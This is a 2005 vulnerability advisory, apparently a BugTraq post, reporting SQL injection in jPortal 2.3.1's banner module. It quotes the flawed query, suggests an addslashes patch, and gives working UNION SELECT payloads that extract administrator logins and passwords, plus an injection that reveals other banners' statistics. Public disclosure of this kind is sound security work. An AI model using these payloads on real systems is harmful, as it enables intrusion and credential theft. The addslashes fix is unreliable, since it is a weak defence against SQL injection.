Sql injection in jPortal version 2.3.1 (module banner)

2005-04-12T00:00:00
ID SECURITYVULNS:DOC:8292
Type securityvulns
Reporter Securityvulns
Modified 2005-04-12T00:00:00

Description

Hello BugTraq,

I've found possibility to inject sql code in jPortal version 2.3.1, in module "banner" (module/banner.inc.php).

Bug is in these lines of code: [code] $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code] - line 192.

There is unfiltered variable $haslo. In order to patch this code just do this: [code] $haslo = addslashes($haslo); $query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC"; [/code]

[exploit] go to http://[victim]/jportal/banner.php and try this:

' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

and then:

' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL from admins where '1=1

After that, You gain login and password of administrator. [/exploit]

[exploit2] try to inject this code: ' or id='x x - banner id After that, You can see statistics of not banners, to which you haven't got passwords. [/exploit2]

Vendor (http://jportal2.com) has been informed already.

-- Best regards, Marcin "CiNU5" Krupowicz